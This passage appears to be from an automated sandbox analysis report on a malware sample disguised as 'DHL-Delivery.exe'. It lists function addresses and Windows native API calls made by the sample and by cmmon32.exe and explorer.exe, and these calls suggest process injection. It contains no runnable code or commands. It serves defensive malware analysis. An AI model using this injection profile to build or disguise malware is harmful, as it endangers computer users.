    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ADC1 NtQueryInformationProcess,6_2_0056ADC1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ADA1 NtQueryInformationProcess,6_2_0056ADA1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AE0B NtQueryInformationProcess,6_2_0056AE0B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AE2E NtQueryInformationProcess,6_2_0056AE2E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AEE7 NtQueryInformationProcess,6_2_0056AEE7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AEA0 NtQueryInformationProcess,6_2_0056AEA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AF5F NtQueryInformationProcess,6_2_0056AF5F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AF38 NtQueryInformationProcess,6_2_0056AF38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AFC9 NtQueryInformationProcess,6_2_0056AFC9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AFED NtQueryInformationProcess,6_2_0056AFED
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AF84 NtQueryInformationProcess,6_2_0056AF84
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD04E0 NtReadFile,LdrInitializeThunk,10_2_04CD04E0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD05F0 NtQueryValueKey,LdrInitializeThunk,10_2_04CD05F0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0570 NtClose,LdrInitializeThunk,10_2_04CD0570
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0680 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04CD0680
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD06B0 NtQueryInformationToken,LdrInitializeThunk,10_2_04CD06B0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0670 NtCreateKey,LdrInitializeThunk,10_2_04CD0670
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0600 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04CD0600
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD07E0 NtDelayExecution,LdrInitializeThunk,10_2_04CD07E0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0720 NtMapViewOfSection,LdrInitializeThunk,10_2_04CD0720
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0F80 NtCreateMutant,LdrInitializeThunk,10_2_04CD0F80
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD08B0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04CD08B0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0800 NtQuerySystemInformation,LdrInitializeThunk,10_2_04CD0800
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD09F0 NtCreateFile,LdrInitializeThunk,10_2_04CD09F0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0940 NtCreateSection,LdrInitializeThunk,10_2_04CD0940
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD04C0 NtWaitForSingleObject,10_2_04CD04C0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0590 NtQueryInformationFile,10_2_04CD0590
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD05B0 NtEnumerateValueKey,10_2_04CD05B0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0500 NtWriteFile,10_2_04CD0500
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD16C0 NtOpenProcessToken,10_2_04CD16C0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD06D0 NtQueryVirtualMemory,10_2_04CD06D0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0610 NtQueryInformationProcess,10_2_04CD0610
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD07C0 NtEnumerateKey,10_2_04CD07C0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0740 NtUnmapViewOfSection,10_2_04CD0740
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0700 NtOpenProcess,10_2_04CD0700
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0710 NtSetInformationFile,10_2_04CD0710
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD1720 NtOpenThread,10_2_04CD1720
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD1360 NtGetContextThread,10_2_04CD1360
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD1CE0 NtSetContextThread,10_2_04CD1CE0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD1FF0 NtSuspendThread,10_2_04CD1FF0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD08F0 NtQueueApcThread,10_2_04CD08F0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0890 NtReadVirtualMemory,10_2_04CD0890
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0840 NtWriteVirtualMemory,10_2_04CD0840
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD09C0 NtResumeThread,10_2_04CD09C0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD09A0 NtProtectVirtualMemory,10_2_04CD09A0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD09B0 NtQuerySection,10_2_04CD09B0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0970 NtCreateProcessEx,10_2_04CD0970
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0AA0 NtSetValueKey,10_2_04CD0AA0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD0A20 NtOpenDirectoryObject,10_2_04CD0A20
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9D60 NtCreateFile,10_2_00CA9D60
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9E90 NtClose,10_2_00CA9E90
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9E10 NtReadFile,10_2_00CA9E10
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9F40 NtAllocateVirtualMemory,10_2_00CA9F40
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9E8B NtClose,10_2_00CA9E8B
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9E0A NtReadFile,10_2_00CA9E0A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CA9F3A NtAllocateVirtualMemory,10_2_00CA9F3A
    Source: C:\Windows\explorer.exeCode function: 18_2_052CFA32 NtCreateFile,18_2_052CFA32
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F6E006_2_1E0F6E00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105E346_2_1E105E34
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E9E396_2_1E0E9E39
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A4E236_2_1E1A4E23
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A6E726_2_1E1A6E72
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115EB06_2_1E115EB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E174EA56_2_1E174EA5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F4EC06_2_1E0F4EC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104EE06_2_1E104EE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11FEE06_2_1E11FEE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E189F0E6_2_1E189F0E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E133F536_2_1E133F53
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161F506_2_1E161F50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDF406_2_1E0EDF40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ABF8A6_2_1E1ABF8A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1AAFDF6_2_1E1AAFDF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE06_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A5FEC6_2_1E1A5FEC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E162C006_2_1E162C00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F0C606_2_1E0F0C60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A5C946_2_1E1A5C94
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105CF96_2_1E105CF9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ABD336_2_1E1ABD33
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EFD606_2_1E0EFD60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7D766_2_1E0E7D76
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D706_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC06_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B7A156_2_1E1B7A15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F1A306_2_1E0F1A30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ABA7A6_2_1E1ABA7A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E184AD16_2_1E184AD1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10BAC06_2_1E10BAC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E122AFC6_2_1E122AFC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE26_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F6B006_2_1E0F6B00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E186B386_2_1E186B38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19DB296_2_1E19DB29
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ABB286_2_1E1ABB28
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F9B756_2_1E0F9B75
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E102B806_2_1E102B80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E107B806_2_1E107B80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E160BBD6_2_1E160BBD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FD8356_2_1E0FD835
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19E8C36_2_1E19E8C3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1308EC6_2_1E1308EC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F790B6_2_1E0F790B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1069206_2_1E106920
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1059506_2_1E105950
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1AB9426_2_1E1AB942
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E39AD6_2_1E0E39AD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1979B66_2_1E1979B6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11C9CF6_2_1E11C9CF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F66616_2_1E0F6661
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E18A66E6_2_1E18A66E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A66DE6_2_1E1A66DE
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1066C16_2_1E1066C1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1086F46_2_1E1086F4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16D6E06_2_1E16D6E0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EE6F06_2_1E0EE6F0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1967506_2_1E196750
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19D7866_2_1E19D786
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A57CA6_2_1E1A57CA
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E18A43A6_2_1E18A43A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19842A6_2_1E19842A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F64636_2_1E0F6463
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F54606_2_1E0F5460
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A64646_2_1E1A6464
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19C4B66_2_1E19C4B6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FB51C6_2_1E0FB51C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1335006_2_1E133500
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F45206_2_1E0F4520
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DF5226_2_1E0DF522
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E12B55D6_2_1E12B55D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10E5606_2_1E10E560
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15F5D16_2_1E15F5D1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1AB5E66_2_1E1AB5E6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1AB29F6_2_1E1AB29F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EA2B06_2_1E0EA2B0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F02C06_2_1E0F02C0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FC2C06_2_1E0FC2C0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F92F66_2_1E0F92F6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EB3106_2_1E0EB310
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A53386_2_1E1A5338
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A93226_2_1E1A9322
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E13356_2_1E0E1335
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F13406_2_1E0F1340
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19A3446_2_1E19A344
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16C3606_2_1E16C360
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DE39D6_2_1E0DE39D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1990686_2_1E199068
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1AB0966_2_1E1AB096
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F90B46_2_1E0F90B4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1AC1396_2_1E1AC139
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A915A6_2_1E1A915A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DC1476_2_1E0DC147
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1141D06_2_1E1141D0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19E1D56_2_1E19E1D5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1341F46_2_1E1341F4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B71F06_2_1E1B71F0
    Source: C:\Windows\explorer.exeCode function: 7_2_05B6E1327_2_05B6E132
    Source: C:\Windows\explorer.exeCode function: 7_2_05B6BB227_2_05B6BB22
    Source: C:\Windows\explorer.exeCode function: 7_2_05B6BB1F7_2_05B6BB1F
    Source: C:\Windows\explorer.exeCode function: 7_2_05B73B0E7_2_05B73B0E
    Source: C:\Windows\explorer.exeCode function: 7_2_05B68CF27_2_05B68CF2
    Source: C:\Windows\explorer.exeCode function: 7_2_05B68CEC7_2_05B68CEC
    Source: C:\Windows\explorer.exeCode function: 7_2_05B70A327_2_05B70A32
    Source: C:\Windows\explorer.exeCode function: 7_2_05B670727_2_05B67072
    Source: C:\Windows\explorer.exeCode function: 7_2_05B6F8627_2_05B6F862
    Source: C:\Windows\explorer.exeCode function: 7_2_05B73A6F7_2_05B73A6F
    Source: C:\Windows\explorer.exeCode function: 7_2_05B670697_2_05B67069
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4C4B610_2_04D4C4B6
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA646310_2_04CA6463
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA546010_2_04CA5460
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5646410_2_04D56464
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D3A43A10_2_04D3A43A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4842A10_2_04D4842A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D0F5D110_2_04D0F5D1
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5B5E610_2_04D5B5E6
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CDB55D10_2_04CDB55D
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CBE56010_2_04CBE560
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CE350010_2_04CE3500
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CAB51C10_2_04CAB51C
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA452010_2_04CA4520
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C8F52210_2_04C8F522
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB66C110_2_04CB66C1
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D566DE10_2_04D566DE
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D1D6E010_2_04D1D6E0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C9E6F010_2_04C9E6F0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB86F410_2_04CB86F4
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA666110_2_04CA6661
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D3A66E10_2_04D3A66E
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D557CA10_2_04D557CA
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4D78610_2_04D4D786
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4675010_2_04D46750
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5B09610_2_04D5B096
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA90B410_2_04CA90B4
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4906810_2_04D49068
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4E1D510_2_04D4E1D5
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CC41D010_2_04CC41D0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D671F010_2_04D671F0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CE41F410_2_04CE41F4
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C621FA10_2_04C621FA
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5915A10_2_04D5915A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C8C14710_2_04C8C147
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5C13910_2_04D5C139
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA02C010_2_04CA02C0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CAC2C010_2_04CAC2C0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA92F610_2_04CA92F6
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5B29F10_2_04D5B29F
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C9A2B010_2_04C9A2B0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C8E39D10_2_04C8E39D
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA134010_2_04CA1340
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4A34410_2_04D4A344
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D1C36010_2_04D1C360
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C9B31010_2_04C9B310
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5533810_2_04D55338
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5932210_2_04D59322
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C9133510_2_04C91335
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB5CF910_2_04CB5CF9
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D55C9410_2_04D55C94
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA0C6010_2_04CA0C60
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D12C0010_2_04D12C00
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D07DC010_2_04D07DC0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C9FD6010_2_04C9FD60
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA2D7010_2_04CA2D70
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C97D7610_2_04C97D76
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5BD3310_2_04D5BD33
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA4EC010_2_04CA4EC0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB4EE010_2_04CB4EE0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CCFEE010_2_04CCFEE0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D24EA510_2_04D24EA5
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CC5EB010_2_04CC5EB0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D56E7210_2_04D56E72
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA6E0010_2_04CA6E00
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C99E3910_2_04C99E39
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D54E2310_2_04D54E23
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB5E3410_2_04CB5E34
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5AFDF10_2_04D5AFDF
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB0FE010_2_04CB0FE0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D55FEC10_2_04D55FEC
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5BF8A10_2_04D5BF8A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D11F5010_2_04D11F50
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C9DF4010_2_04C9DF40
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CE3F5310_2_04CE3F53
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D39F0E10_2_04D39F0E
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4E8C310_2_04D4E8C3
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CE08EC10_2_04CE08EC
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CCC9CF10_2_04CCC9CF
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D479B610_2_04D479B6
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04C939AD10_2_04C939AD
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5B94210_2_04D5B942
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB595010_2_04CB5950
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA790B10_2_04CA790B
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB692010_2_04CB6920
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D34AD110_2_04D34AD1
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CBBAC010_2_04CBBAC0
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D20AE210_2_04D20AE2
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CD2AFC10_2_04CD2AFC
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4BAAD10_2_04D4BAAD
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5BA7A10_2_04D5BA7A
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D67A1510_2_04D67A15
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA1A3010_2_04CA1A30
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB2B8010_2_04CB2B80
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CB7B8010_2_04CB7B80
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D10BBD10_2_04D10BBD
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA9B7510_2_04CA9B75
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04CA6B0010_2_04CA6B00
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4CB0F10_2_04D4CB0F
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D36B3810_2_04D36B38
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D5BB2810_2_04D5BB28
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04D4DB2910_2_04D4DB29
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CAE17110_2_00CAE171
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CAE58E10_2_00CAE58E
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00C92D9010_2_00C92D90
